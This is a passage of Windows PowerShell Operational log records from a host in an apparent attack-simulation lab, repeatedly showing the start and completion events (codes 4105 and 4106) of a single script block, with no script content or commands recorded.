Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475113
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475112
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475111
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475110
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475109
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475108
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475107
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475106
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475105
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475104
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475103
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475102
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475101
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475100
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475099
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475098
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475097
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475096
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475095
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475094
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475093
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475092
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475091
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475090
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475089
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475088
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475087
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475086
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475085
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475084
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475083
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475082
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475081
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475080
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475079
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475078
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475077
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475076
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475075
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475074
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475073
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475072
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475071
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475070
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475069
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475068
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475067
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475066
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475065
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475064
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475063
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475062
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475061
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475060
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
